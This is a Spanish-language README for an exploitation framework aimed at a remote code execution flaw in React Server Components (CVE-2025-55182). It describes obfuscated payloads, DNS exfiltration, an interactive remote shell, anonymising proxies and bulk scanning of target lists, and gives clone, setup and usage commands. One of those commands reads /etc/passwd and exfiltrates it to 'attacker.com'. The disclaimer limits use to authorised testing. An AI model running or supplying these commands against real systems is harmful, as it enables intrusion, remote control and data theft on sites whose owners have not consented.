
Escáner avanzado de RCE para React Server Components para CVE-2025-55182. Características: fingerprinting multietapa, verificación de vulnerabilidades, exfiltración por DNS, shell interactivo, ofuscación de payloads y generación de informes profesionales (JSON/HTML/PDF). Solo para pruebas autorizadas.
Esta herramienta está diseñada exclusivamente con fines EDUCATIVOS y de PRUEBAS DE SEGURIDAD AUTORIZADAS. La utilización no autorizada de este software contra objetivos sin consentimiento previo por escrito constituye una violación de las leyes internacionales de delitos informáticos, incluida la Ley de Fraude y Abuso Informático (CFAA), los mandatos del RGPD y los acuerdos estándar de términos de servicio. El autor y los colaboradores declinan toda responsabilidad por cualquier uso indebido, operación ilegal o daño consecuente derivado de este programa. Proceda estrictamente bajo su propio riesgo.
ReactRCE-Scanner es un framework de evaluación y verificación de seguridad de nivel empresarial diseñado específicamente para CVE-2025-55182 [1], una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a React Server Components en las versiones 19.0.0 a 19.2.0.
El framework cierra la brecha entre la investigación teórica de vulnerabilidades y la validación práctica de seguridad. Al incorporar fingerprinting multietapa, rigurosa reducción de falsos positivos, ofuscación avanzada de payloads y generación automatizada de informes en múltiples formatos, proporciona a los ingenieros de seguridad capacidades de diagnóstico precisas.
| Uso | Resultados del escaneo |
|---|---|
| Categoría de función | Aspecto destacado de la implementación | Estado operativo |
|---|---|---|
| Fingerprinting inteligente | Detección de framework y versión multifuente con algoritmos de puntuación de confianza. | ✅ |
| Verificación multietapa | Pipeline de validación de 5 etapas diseñado para eliminar sistemáticamente los falsos positivos. | ✅ |
| Generación de payloads | Constructor de payloads ofuscados compatible con exfiltración DNS y multicodificación. | ✅ |
| Shell interactiva | Ejecución de comandos pseudointeractiva en tiempo real y acceso a shell en objetivos verificados. | ✅ |
| Informes completos | Generación automatizada de informes en formatos JSON, HTML, PDF y Markdown. | ✅ |
| Exfiltración DNS | Exfiltración fuera de banda de la salida de comandos mediante el manejo seguro de consultas DNS. | ✅ |
| Motor de concurrencia | Arquitectura de escaneo multihilo de alto rendimiento para grandes superficies de ataque. | ✅ |
| Integración de proxy | Compatibilidad con proxy HTTP/HTTPS y SOCKS para tráfico de evaluación anonimizado. | ✅ |
Clone el repositorio e inicialice el entorno utilizando el script de configuración automatizado o la instalación manual de dependencias:
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh
# Alternatively, install core Python dependencies manually
pip install -r requirements.txt
El framework opera mediante una arquitectura CLI modular que admite validación de un solo objetivo, escaneo masivo desde listas de archivos, apertura de shell interactiva y generación de informes de cumplimiento.
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan
# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json
# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"
# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell
# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com
# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf
El framework realiza un reconocimiento profundo antes de la entrega del payload. Analiza múltiples campos de encabezados HTTP (X-Powered-By, Next-Action, RSC), metaetiquetas estructurales HTML (data-reactroot, __NEXT_DATA__), recursos de compilación estáticos y paquetes de código fuente JavaScript [2] [3].
Las puntuaciones de confianza se clasifican en cuatro niveles:
CRÍTICA (95%+): Múltiples indicadores ortogonales confirman versiones vulnerables del entorno de ejecución de React Server Components.
ALTA (75–95%): Indicadores estructurales sólidos identificados con coincidencia exacta de versión.
MEDIA (50–75%): Marcadores parciales del framework presentes; se requiere verificación manual.
BAJA (<50%): Heurísticas débiles detectadas; alta probabilidad de falso positivo.